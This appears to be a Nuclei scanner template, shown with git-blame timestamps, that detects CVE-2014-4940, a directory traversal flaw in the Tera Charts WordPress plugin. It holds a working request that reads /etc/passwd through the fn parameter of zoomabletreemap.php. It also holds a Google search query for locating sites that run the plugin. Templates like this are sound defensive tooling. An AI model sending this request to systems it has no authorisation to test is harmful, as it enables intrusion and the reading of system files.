2021-08-09 23:05:56 +00:00
id : CVE-2014-4940
info :
name : WordPress Plugin Tera Charts - Directory Traversal
author : daffainfo
severity : high
description : Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2014-4940
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail=
- http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/
2022-02-25 14:32:23 +00:00
classification :
cve-id : CVE-2014-4940
2022-07-11 17:25:38 +00:00
metadata :
google-query : inurl:"/wp-content/plugins/tera-charts"
2022-04-22 10:38:41 +00:00
tags : cve,cve2014,wordpress,wp-plugin,lfi
2021-08-09 23:05:56 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-08-09 23:05:56 +00:00
- type : status
status :
- 200
2022-02-25 14:32:23 +00:00
# Enhanced by mp on 2022/02/24